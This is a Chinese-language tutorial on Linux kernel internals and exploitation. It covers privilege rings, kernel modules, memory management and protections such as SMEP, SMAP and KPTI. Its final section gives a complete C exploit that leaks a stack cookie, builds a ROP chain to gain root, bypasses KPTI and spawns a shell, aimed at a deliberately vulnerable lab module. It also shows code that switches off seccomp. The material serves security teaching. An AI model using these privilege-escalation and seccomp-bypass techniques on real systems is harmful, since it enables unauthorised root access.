Linux内核安全：漏洞利用与防护技术的博弈<\/h1>

内核基础<\/h2>

什么是内核？<\/h3>
内核是操作系统的核心组件，负责管理计算机硬件资源和提供基础服务以支持系统软件和应用程序的运行。它是操作系统中最高权限的部分，直接与硬件交互，并通过抽象硬件功能，为用户态进程提供统一的接口。<\/p>

内核常用指令<\/h3>

特权指令<\/h4>
CLI<\/code>: 清除中断标志，禁止中断<\/li>
STI<\/code>: 设置中断标志，允许中断<\/li>
HLT<\/code>: 停止处理器，直到下一个中断发生<\/li>
IN\/OUT<\/code>: 从I\/O端口读写数据<\/li>
LGDT\/SGDT<\/code>: 加载\/存储全局描述符表(GDT)<\/li>
LIDT\/SIDT<\/code>: 加载\/存储中断描述符表(IDT)<\/li>
LTR<\/code>: 加载任务寄存器<\/li>
MOV CRx<\/code>: 读取或写入控制寄存器(如CR0、CR3)<\/li>
<\/ul>
系统调用相关指令<\/h4>

SYSCALL\/SYSRET<\/code>: 用于快速调用和返回系统调用(在x86_64架构上)<\/li>
INT 0x80<\/code>: 通过中断调用系统调用(在x86架构上)<\/li>
<\/ul>
页表管理<\/h4>

MOV CR3<\/code>: 设置页表基地址寄存器，切换页表<\/li>
INVLPG<\/code>: 无效化某个虚拟地址的页表缓存<\/li>
<\/ul>
调试指令<\/h4>

INT3<\/code>: 触发断点中断，通常用于调试<\/li>
RDTSC<\/code>: 读取时间戳计数器，测量精确的时间<\/li>
<\/ul>
特殊寄存器<\/h3>

cr3 (Control Register 3)<\/strong>: 记录页表信息，用于将进程的虚拟地址转换为物理地址，这个寄存器直接用mov指令就能操作，但是要在内核模式下才能访问<\/li>
MSR LSTAR (Model-Specific Register, Long Syscall Target Address Register)<\/strong>: 记录了系统调用会跳转到哪里执行，使用wrmsr<\/code>和rdmsr<\/code>指令操作，这两个指令也仅供内核使用<\/li>
<\/ul>
用户模式特权级别<\/h3>
CPU在执行时会记录当前程序的权限级别：<\/p>

Ring 3<\/strong>: 用户模式，权限最低，限制较多，无法访问CR3等内核模式寄存器，无法执行HLT指令等<\/li>
Ring 0<\/strong>: 内核模式，权限最高，可以执行任何指令和访问所有寄存器<\/li>
Ring -1<\/strong>: 管理模式(主要用于虚拟化)，可以拦截敏感操作，确保虚拟机中的用户内核无法无限制地访问主机硬件<\/li>
<\/ul>
操作系统模型类型<\/h3>

单片内核<\/strong>: 所有操作系统级别任务由一个统一的内核二进制文件处理。驱动程序作为库加载到此二进制文件中。示例: Linux、FreeBSD<\/li>
微内核<\/strong>: 只有一个微小的核心二进制文件，提供进程间通信和与硬件的最小交互。驱动程序作为普通用户空间程序运行，具有稍高的权限。示例: Minux、seL4<\/li>
混合内核<\/strong>: 结合了微内核和单片内核的特点。示例: Windows NT、MacOS<\/li>
<\/ol>
环与环之间切换<\/h3>
在x86_64架构下：<\/p>

内核启动时在Ring 0中，将MSR LSTAR设置为指向系统调用处理程序例程<\/li>
当用户空间(Ring 3)进程想要与内核交互时，可以调用syscall<\/code>:

权限级别切换至Ring 0<\/li>
控制流跳转到MSR LSTAR的值<\/li>
返回地址保存到rcx<\/li>
<\/ul>
<\/li>
内核返回用户空间时，通过sysret<\/code>指令完成:

权限级别切换到Ring 3<\/li>
控制流跳转到rcx<\/li>
<\/ul>
<\/li>
<\/ol>
内核与用户空间的关系<\/h3>

用户空间进程的虚拟内存位于低地址<\/li>
内核拥有自己的虚拟内存空间，位于高地址，只有在Ring 0才能访问<\/li>
<\/ul>
攻击方式<\/h2>
内核漏洞来源<\/h3>

来自网络: 远程触发漏洞，如死亡数据包<\/li>
来自用户空间: 系统调用和ioctl处理程序中的漏洞<\/li>
来自设备: 从连接的设备(如USB硬件)触发的漏洞<\/li>
<\/ol>
常见的内核漏洞利用手段<\/h3>

提升权限、安装rootkit<\/li>
获得更多访问权限，攻击系统其他部分，如受信任的执行环境<\/li>
<\/ol>
内核调试环境搭建<\/h2>
虚拟机环境设置<\/h3>
推荐使用pwnkernel<\/a>项目快速搭建调试环境：<\/p>

解压后进入文件夹<\/li>
执行build.sh<\/code>脚本自动安装调试内核所需的程序和编译内核<\/li>
运行launch.sh<\/code>脚本启动qemu，进入虚拟linux系统环境<\/li>
<\/ol>
调试内核与syscall<\/h3>

启动qemu时开启了gdb远程调试(默认端口1234)与关闭了地址随机化<\/li>
内核文件是.\/linux-5.4\/vmlinux<\/code><\/li>
可以通过gdb远程连接进行调试<\/li>
<\/ol>
内核模块<\/h2>
内核模块基础<\/h3>

内核模块是linux生态系统的重要组成部分，主要用于实现设备驱动程序<\/li>
概念上类似于用户空间的库，内核将内核模块加载到自身以提供各种功能<\/li>
这些模块是一个ELF文件，扩展名为.ko<\/code><\/li>
模块中的代码会以内核相同的权限运行<\/li>
<\/ul>
内核模块交互<\/h3>
与内核模块交互的最常见方法是通过文件：<\/p>

\/dev<\/code>: 包含设备文件，是系统中的硬件设备和虚拟设备的接口<\/li>
\/proc<\/code>: 伪文件系统，提供接口来访问内核和进程信息<\/li>
\/sys<\/code>: sysfs文件系统的挂载点，提供统一接口来查看和配置内核对象<\/li>
<\/ol>
交互接口函数：<\/p>

从内核空间调用:
static<\/span> ssize_t device_read(struct<\/span> file *<\/span>filp, char<\/span> *<\/span>buffer, size_t length, loff_t *<\/span>offset)
<\/span><\/span>static<\/span> ssize_t device_write(struct<\/span> file *<\/span>filp, const<\/span> char<\/span> *<\/span>buf, size_t len, loff_t *<\/span>off)
<\/span><\/span><\/code><\/pre><\/li>
从用户空间调用:
fd =<\/span> open('<\/span>\/<\/span>dev\/<\/span>1<\/span>'<\/span>, 0<\/span>);
<\/span><\/span>read(fd, buffer, 128<\/span>);
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
高级接口ioctl<\/code>:<\/p>

内核空间调用:
static<\/span> long<\/span> device_ioctl(struct<\/span> file *<\/span>filp, unsigned<\/span> int<\/span> ioctl_num, unsigned<\/span> long<\/span> ioctl_param)
<\/span><\/span><\/code><\/pre><\/li>
用户空间调用:
int<\/span> fd=<\/span>open("\/dev\/1"<\/span>, 0<\/span>);
<\/span><\/span>ioctl(fd, COMMAND_CODE, &<\/span>custom_data_structure);
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
编译模块<\/h3>

在src\/mymodule.c<\/code>中编写内核模块<\/li>
用src\/Makefile<\/code>添加一个条目<\/li>
执行make<\/code>即可<\/li>
执行build.sh<\/code>自动编译<\/li>
执行launch<\/code>启动环境<\/li>
<\/ol>
导入内核模块<\/h3>

使用init_module<\/code>函数完成系统调用加载<\/li>
也可以用insmod<\/code>命令载入
insmod baimao_module.ko
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
删除内核模块<\/h3>

使用系统调用delete_module<\/code>删除加载的模块<\/li>
也可以用rmmod<\/code>命令删除
rmmod baimao_module
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
内核漏洞<\/h2>
内核内存损坏<\/h3>
每个内核模块都有两个非常重要的函数：<\/p>

copy_to_user<\/code>: 将数据从内核空间复制到用户空间<\/li>
copy_from_user<\/code>: 将数据从用户空间复制到内核空间<\/li>
<\/ul>
内核内存损坏可能导致以下后果：<\/p>

系统崩溃<\/li>
系统变砖<\/li>
权限提升<\/li>
干扰其他进程<\/li>
<\/ol>
权限提升原理<\/h3>
内核通过task_struct<\/code>记录进程信息，其中最重要的是进程凭据(cred<\/code>)，cred<\/code>结构体中包含进程的euid<\/code>(有效用户ID)。如果将euid<\/code>改为0，当前进程就是root权限。<\/p>
提权方法：<\/p>
commit_creds(prepare_kernel_cred(0<\/span>));
<\/span><\/span><\/code><\/pre>
prepare_kernel_cred(0)<\/code>: 创建一个具有root访问权限和完全权限的cred结构<\/li>
commit_creds()<\/code>: 应用这些凭据<\/li>
<\/ul>
实例演示<\/h3>

编写内核模块在\/proc<\/code>下创建设备文件<\/li>
注册操作函数，在ioctl<\/code>中检查特定参数后执行提权代码<\/li>
用户空间程序通过open<\/code>和ioctl<\/code>触发提权<\/li>
<\/ol>
Seccomp逃逸<\/h2>
Seccomp实现原理<\/h3>

cred<\/code>结构体是task_struct<\/code>的成员<\/li>
task_struct<\/code>中的thread_info<\/code>结构体包含flags<\/code>变量<\/li>
flags<\/code>的第8位是TIF_SECCOMP<\/code>标志位，启用seccomp<\/li>
<\/ul>
如何关闭Seccomp<\/h3>
通过修改task_struct->thread_info.flags<\/code>，清除TIF_SECCOMP<\/code>位：<\/p>
current_task_struct-><\/span>thread_info.flags &=<\/span> ~<\/span>(1<\/span> <<<\/span> TIF_SECCOMP)
<\/span><\/span><\/code><\/pre>实例演示<\/h3>

内核模块提供关闭seccomp的功能<\/li>
用户空间程序启用seccomp防护<\/li>
通过特定ioctl<\/code>调用关闭seccomp<\/li>
<\/ol>
内存管理<\/h2>
进程内存<\/h3>
每个Linux进程的虚拟内存空间包含：<\/p>

二进制文件<\/li>
库文件<\/li>
堆<\/li>
栈<\/li>
专门映射的内存<\/li>
辅助区域<\/li>
内核代码(位于高地址部分)<\/li>
<\/ul>
虚拟内存和物理内存<\/h3>

虚拟内存: 每个进程都有自己独立的虚拟地址空间<\/li>
物理内存: 是计算机实际的内存硬件，所有进程的虚拟内存都会映射到物理内存<\/li>
<\/ul>
页表<\/h3>
页表是内存管理单元(MMU)使用的核心数据结构，用于将虚拟地址映射到物理地址。现代计算机系统通常使用多级页表：<\/p>

PML4(Page Map Level 4): 最高级别的页表<\/li>
PDP(Page Directory Pointer): 指向页目录的指针<\/li>
PD(Page Directory): 页目录，包含指向页表的指针<\/li>
PT(Page Table): 页表，包含指向物理页的指针<\/li>
页内偏移: 物理页内的具体偏移<\/li>
<\/ol>
进程隔离<\/h3>

每个进程都有一个独立的页表<\/li>
CR3寄存器保存当前使用的PML4表的物理地址<\/li>
操作系统在切换进程时通过修改CR3寄存器的值来切换页表<\/li>
CR3寄存器只能在ring0级别访问<\/li>
<\/ul>
虚拟机的内存管理<\/h3>
虚拟机通过扩展页表(EPT)实现二级地址转换：<\/p>

虚拟地址到客体物理地址: 虚拟机内部的页表转换<\/li>
客体物理地址到实际物理地址: 扩展页表转换<\/li>
<\/ol>
内存管理单元(MMU)<\/h3>

负责管理虚拟内存地址到物理内存地址的转换<\/li>
使用转换旁路缓冲区(TLB)缓存最近使用的地址映射<\/li>
检查每次内存访问的权限<\/li>
<\/ul>
内核保护机制<\/h2>

栈金丝雀(Stack canaries)<\/strong>: 在栈上放置特殊值，检测栈溢出攻击<\/li>
kASLR (Kernel Address Space Layout Randomization)<\/strong>: 启动时随机化内核的基址<\/li>
不可执行堆\/栈区域<\/strong>: 禁止执行堆和栈上的代码<\/li>
FGKASLR<\/strong>: 函数级别的地址空间布局随机化<\/li>
SMEP (Supervisor Mode Execution Prevention)<\/strong>: 防止内核执行用户态内存中的代码<\/li>
SMAP (Supervisor Mode Access Prevention)<\/strong>: 防止内核模式访问用户空间内存<\/li>
KPTI (Kernel Page-Table Isolation)<\/strong>: 将内核和用户态的页表分离<\/li>
<\/ol>
内核ROP攻击提权实战<\/h2>
环境准备<\/h3>

提取内核文件: .\/extract-image.sh bzImage > vmlinux<\/code><\/li>
安装必要软件: apt-get install bc bison flex libelf-dev musl-tools cpio build-essential libssl-dev qemu-system-x86<\/code><\/li>
<\/ol>
逆向内核模块<\/h3>
分析vuln.ko<\/code>内核模块，重点关注：<\/p>

init_func<\/code>和exit_func<\/code>: 模块入口和出口<\/li>
sopen<\/code>: 打开设备时的操作<\/li>
sread<\/code>: 读取时的操作(可能导致内存泄漏)<\/li>
swrite<\/code>: 写入时的操作(可能导致栈溢出)<\/li>
sioctl<\/code>: 特殊操作(可能修改全局变量)<\/li>
<\/ol>
漏洞利用步骤<\/h3>

通过sread<\/code>泄露内核地址和cookie值<\/li>
计算内核基地址<\/li>
通过sioctl<\/code>修改MaxBuffer<\/code>全局变量<\/li>
构造ROP链调用commit_creds(prepare_kernel_cred(0))<\/code><\/li>
绕过KPTI防护使用swapgs_restore_regs_and_return_to_usermode<\/code>返回用户空间<\/li>
获取root shell<\/li>
<\/ol>
最终payload示例<\/h3>
#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/stat.h><\/span>
<\/span><\/span><\/span>#include<\/span> <fcntl.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <signal.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>unsigned<\/span> long<\/span> user_cs, user_ss, user_rflags, user_sp;
<\/span><\/span>
<\/span><\/span>void<\/span> save_state<\/span>(){
<\/span><\/span>    __asm__(
<\/span><\/span>        ".intel_syntax noprefix;"<\/span>
<\/span><\/span>        "mov user_cs, cs;"<\/span>
<\/span><\/span>        "mov user_ss, ss;"<\/span>
<\/span><\/span>        "mov user_sp, rsp;"<\/span>
<\/span><\/span>        "pushf;"<\/span>
<\/span><\/span>        "pop user_rflags;"<\/span>
<\/span><\/span>        ".att_syntax;"<\/span>
<\/span><\/span>    );
<\/span><\/span>    puts("[*] Saved state"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> get_shell<\/span>(void<\/span>){
<\/span><\/span>    puts("[*] Returned to userland"<\/span>);
<\/span><\/span>    if<\/span>(getuid() ==<\/span> 0<\/span>){
<\/span><\/span>        printf("[*] UID: %d, got root!<\/span>\n<\/span>"<\/span>, getuid());
<\/span><\/span>        system("\/bin\/sh"<\/span>);
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        printf("[!] UID: %d, didn't get root<\/span>\n<\/span>"<\/span>, getuid());
<\/span><\/span>        exit(-<\/span>1<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> main<\/span>() {
<\/span><\/span>    save_state();
<\/span><\/span>    int<\/span> fd =<\/span> open("\/proc\/pwn_device"<\/span>, O_RDWR);
<\/span><\/span>    unsigned<\/span> long<\/span> leakbuf[0x100<\/span>];
<\/span><\/span>    read(fd, leakbuf, 0x100<\/span>);
<\/span><\/span>    
<\/span><\/span>    unsigned<\/span> long<\/span> kernel_base =<\/span> leakbuf[18<\/span>] -<\/span> 0x23e347<\/span>;
<\/span><\/span>    unsigned<\/span> long<\/span> kernel_cookie =<\/span> leakbuf[14<\/span>];
<\/span><\/span>    unsigned<\/span> long<\/span> prepare_kernel_cred =<\/span> kernel_base +<\/span> 0x881c0<\/span>;
<\/span><\/span>    unsigned<\/span> long<\/span> commit_creds =<\/span> kernel_base +<\/span> 0x87e80<\/span>;
<\/span><\/span>    unsigned<\/span> long<\/span> user_rip =<\/span> (unsigned<\/span> long<\/span>)get_shell;
<\/span><\/span>    unsigned<\/span> long<\/span> kpti_trampoline =<\/span> kernel_base +<\/span> 0xc00a2f<\/span> +<\/span> 22<\/span>;
<\/span><\/span>    unsigned<\/span> long<\/span> pop_rdi =<\/span> kernel_base +<\/span> 0x1518<\/span>;
<\/span><\/span>    unsigned<\/span> long<\/span> pop_rdx =<\/span> kernel_base +<\/span> 0x34b72<\/span>;
<\/span><\/span>    unsigned<\/span> long<\/span> iretq =<\/span> kernel_base +<\/span> 0x23cc2<\/span>;
<\/span><\/span>    unsigned<\/span> long<\/span> swapgs_ret =<\/span> kernel_base +<\/span> 0xc00eaa<\/span>;
<\/span><\/span>    unsigned<\/span> long<\/span> cmp_rdx_ret =<\/span> kernel_base +<\/span> 0xa30061<\/span>;
<\/span><\/span>    unsigned<\/span> long<\/span> mov_rdi_rax_ret =<\/span> kernel_base +<\/span> 0x3b3504<\/span>;
<\/span><\/span>
<\/span><\/span>    printf("[*] kernel cookie: 0x%lx<\/span>\n<\/span>"<\/span>, kernel_cookie);
<\/span><\/span>    printf("[*] kernel leak: 0x%lx<\/span>\n<\/span>"<\/span>, leakbuf[18<\/span>]);
<\/span><\/span>    printf("[*] kernel base address: 0x%lx<\/span>\n<\/span>"<\/span>, kernel_base);
<\/span><\/span>    printf("[*] prepare_kernel_cred: 0x%lx<\/span>\n<\/span>"<\/span>, prepare_kernel_cred);
<\/span><\/span>    printf("[*] commit_creds: 0x%lx<\/span>\n<\/span>"<\/span>, commit_creds);
<\/span><\/span>
<\/span><\/span>    ioctl(fd, 0x20<\/span>, 0x1337<\/span>);
<\/span><\/span>    int<\/span> offset =<\/span> 16<\/span>;
<\/span><\/span>    unsigned<\/span> long<\/span> payload[50<\/span>];
<\/span><\/span>    payload[offset++<\/span>] =<\/span> kernel_cookie;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> 0x0<\/span>;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> pop_rdi;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> 0x0<\/span>;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> prepare_kernel_cred;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> pop_rdx;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> 0x8<\/span>;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> cmp_rdx_ret;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> mov_rdi_rax_ret;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> commit_creds;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> kpti_trampoline;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> 0x0<\/span>;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> 0x0<\/span>;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> user_rip;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> user_cs;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> user_rflags;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> user_sp;
<\/span><\/span>    payload[offset++<\/span>] =<\/span> user_ss;
<\/span><\/span>
<\/span><\/span>    write(fd, payload, sizeof<\/span>(payload));
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>总结<\/h2>
Linux内核安全是一个持续的博弈过程，随着新的防护机制出现，攻击者也会发展出新的绕过技术。理解内核工作原理、内存管理和各种防护机制是进行安全研究和漏洞利用的基础。通过实际的内核模块开发和漏洞利用实践，可以深入掌握这些概念和技术。<\/p>